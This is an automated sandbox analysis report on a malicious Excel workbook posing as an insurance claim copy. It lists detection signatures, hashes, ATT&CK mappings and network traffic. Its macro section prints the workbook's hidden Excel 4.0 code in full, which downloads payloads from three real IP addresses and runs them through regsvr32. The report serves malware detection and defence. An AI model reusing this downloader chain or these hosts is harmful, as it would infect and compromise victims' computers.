Windows Analysis Report ClaimCopy-539408676-12022021.xlsb
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Jbx Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found protected and hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Macro extractor: | ||
Source: | Macro extractor: |
Source: | Code function: | 0_2_024E6743 | |
Source: | Code function: | 0_2_024E6340 | |
Source: | Code function: | 0_2_024E6753 | |
Source: | Code function: | 0_2_024E66E8 | |
Source: | Code function: | 0_2_024E66F3 |
Source: | Virustotal: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting2 | Path Interception | Process Injection2 | Masquerading1 | OS Credential Dumping | Virtualization/Sandbox Evasion1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection2 | NTDS | System Information Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting2 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
10% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown | |
false |
| unknown | |
false |
| unknown | |
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| low |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
45.142.211.62 | unknown | Russian Federation | 208861 | RACKTECHRU | false | |
158.69.133.78 | unknown | Canada | 16276 | OVHFR | false | |
185.82.126.78 | unknown | Latvia | 52173 | MAKONIXLV | false |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 532685 |
Start date: | 02.12.2021 |
Start time: | 16:09:25 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 54s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | ClaimCopy-539408676-12022021.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLSB@13/5@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
16:10:43 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
RACKTECHRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
OVHFR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85681 |
Entropy (8bit): | 7.915850776614707 |
Encrypted: | false |
SSDEEP: | 1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit |
MD5: | 4F100E2CEFED046B44EC799015B454EF |
SHA1: | 5149E5D1B5212C77B3548914E9B47D67B4BEA574 |
SHA-256: | D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C |
SHA-512: | 153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 99418 |
Entropy (8bit): | 7.830598578936149 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU9R9/:I3c6EehCfCZpUHKGXbBKsiiC |
MD5: | 3AEEF9C5D82677775B1050AAF5887584 |
SHA1: | ADEDF2A91DCA207EFFD08EE70BBC8617F17C6557 |
SHA-256: | 1C9878EF462B94000F96372344500F0E43520681A6C82E59646B2E3885D78B75 |
SHA-512: | D9E4572E3D85B897B2939962EF9BE5A6A508F8E2C440AA970FABF35F12A446F181B829F21D3977982E43873C4F1858D6EA51266FFB64C3D1F0C0A9AA1FD101A2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 99418 |
Entropy (8bit): | 7.830598578936149 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU9R9/:I3c6EehCfCZpUHKGXbBKsiiC |
MD5: | 3AEEF9C5D82677775B1050AAF5887584 |
SHA1: | ADEDF2A91DCA207EFFD08EE70BBC8617F17C6557 |
SHA-256: | 1C9878EF462B94000F96372344500F0E43520681A6C82E59646B2E3885D78B75 |
SHA-512: | D9E4572E3D85B897B2939962EF9BE5A6A508F8E2C440AA970FABF35F12A446F181B829F21D3977982E43873C4F1858D6EA51266FFB64C3D1F0C0A9AA1FD101A2 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.831010211626038 |
TrID: |
|
File name: | ClaimCopy-539408676-12022021.xlsb |
File size: | 99677 |
MD5: | 4b4aacfd637f34a8c9111d80578bf275 |
SHA1: | 86b477fdaa06a4fcd7e863af0b7dc9321b9978e4 |
SHA256: | 04a5fd7cd4e3a83f37c9d9b5152a0985278a9d4a6cd749935fdffd1292fdc49f |
SHA512: | 0e5babb339a32868b4198c7d2d4714638033602f12bb30582766ae4de5feb8ec41b3ba18e2e36476a5676b97d8312f818daeb4364dd81faf3fa567a17a013c31 |
SSDEEP: | 1536:hMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:Nc6EehCfCZpUHKGXbBKsiiOp |
File Content Preview: | PK..........!...~.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2ea8aa4b4b4b4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "ClaimCopy-539408676-12022021.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
8,6,=Drozd(0,"http://185.82.126.78/397887857128.dat","C:\ProgramData\Volet1.ocx",0,0) 9,6,=Drozd(0,"http://158.69.133.78/397887857128.dat","C:\ProgramData\Volet2.ocx",0,0) 10,6,=Drozd(0,"http://45.142.211.62/397887857128.dat","C:\ProgramData\Volet3.ocx",0,0) 11,6,=Drozd(0,"http://45.142.211.62/397887857128.dat2","C:\ProgramData\Volet4.ocx",0,0) 12,6,=Drozd(0,"http://185.82.126.78/397887857128.dat2","C:\ProgramData\Volet5.ocx",0,0) 13,6,=Drozd(0,"http://158.69.133.78/397887857128.dat2","C:\ProgramData\Volet6.ocx",0,0) 15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx") 16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx") 17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx") 18,6,=EXEC("regsvr32 -e -n -i:&"397887857128"& C:\ProgramData\Volet4.ocx") 19,6,=EXEC("regsvr32 -e -n -i:&"397887857128"& C:\ProgramData\Volet5.ocx") 20,6,=EXEC("regsvr32 -e -n -i:&"397887857128"& C:\ProgramData\Volet6.ocx") 23,6,=HALT()
1,1,523 4,9,34543 4,12,43 5,2,ui 5,9,7 5,14,43 6,14,36 7,0,ug 7,1,еу5цу5 8,9,34 8,10,5 9,1,y 9,16,346 10,7,rt 10,8,345 10,9,u 11,2,23 11,7,ertertyh57s5ry 11,11,5 11,12,35 12,1,65 12,2,7 12,9,r67 13,2,mfy 13,7,65 13,10,7 13,14,34 13,15,543 14,0,uh 14,1,y 15,0,7 15,7,65 15,10,ae46 16,2,d7 16,3,uRl 17,3,="Mon" 17,9,dt 17,10,6 17,12,u 17,13,5 18,3,="URLDownloadTo" 18,8,yu 18,10,sb 18,14,5 19,3,="JJCCBB" 19,7,f 20,0,7 20,1,7 20,4,185.82.126.78/ 20,7,523 20,8,u 21,0,md 21,4,158.69.133.78/ 21,6,=RANDBETWEEN(142536473,988879789754) 21,9,s 21,11,m 22,1,7 22,4,45.142.211.62/ 22,6,=".dat" 22,8,6 23,4,45.142.211.62/ 23,6,=".dat2" 23,11,4 23,15,46 24,4,185.82.126.78/ 24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9) 24,8,23 24,14,6 24,15,43 25,1,567 25,4,158.69.133.78/ 25,10,23 25,13,5 28,2,756 37,6,=GOTO(Tiposa1!G8)
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/02/21-16:10:25.632241 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
12/02/21-16:10:26.574859 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
12/02/21-16:10:29.832836 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
12/02/21-16:10:30.027399 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
12/02/21-16:10:30.211827 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
12/02/21-16:10:30.735520 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2021 16:10:25.168994904 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:25.229886055 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:25.230056047 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:25.231389046 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:25.291949987 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:25.632241011 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:25.637115955 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:25.664262056 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:25.771842957 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:25.772038937 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:25.773314953 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:25.880645037 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:26.574858904 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:26.574981928 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:26.584788084 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.594575882 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.631189108 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:29.631477118 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.632947922 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.672388077 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:29.832835913 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:29.832989931 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.840528011 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:29.876952887 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:30.027399063 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:10:30.027755976 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:10:30.030435085 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:30.091200113 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:30.211827040 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:10:30.211921930 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:10:30.213552952 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:10:30.321049929 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:30.735519886 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:10:30.735712051 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:11:35.026017904 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:11:35.026089907 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:11:35.213016033 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:11:35.213315964 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:11:35.738107920 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 16:11:35.738182068 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:12:25.061552048 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 16:12:25.062350035 CET | 49167 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 16:12:25.062480927 CET | 49168 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 16:12:25.098237038 CET | 80 | 49169 | 45.142.211.62 | 192.168.2.22 |
Dec 2, 2021 16:12:25.122937918 CET | 80 | 49167 | 185.82.126.78 | 192.168.2.22 |
Dec 2, 2021 16:12:25.169639111 CET | 80 | 49168 | 158.69.133.78 | 192.168.2.22 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 185.82.126.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 16:10:25.231389046 CET | 0 | OUT | |
Dec 2, 2021 16:10:25.632241011 CET | 1 | IN | |
Dec 2, 2021 16:10:30.030435085 CET | 5 | OUT | |
Dec 2, 2021 16:10:30.211827040 CET | 6 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 158.69.133.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 16:10:25.773314953 CET | 1 | OUT | |
Dec 2, 2021 16:10:26.574858904 CET | 2 | IN | |
Dec 2, 2021 16:10:30.213552952 CET | 7 | OUT | |
Dec 2, 2021 16:10:30.735519886 CET | 7 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 45.142.211.62 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 16:10:29.632947922 CET | 3 | OUT | |
Dec 2, 2021 16:10:29.832835913 CET | 4 | IN | |
Dec 2, 2021 16:10:29.840528011 CET | 4 | OUT | |
Dec 2, 2021 16:10:30.027399063 CET | 5 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 16:10:23 |
Start date: | 02/12/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f030000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:10:33 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff0f0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:10:33 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff0f0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
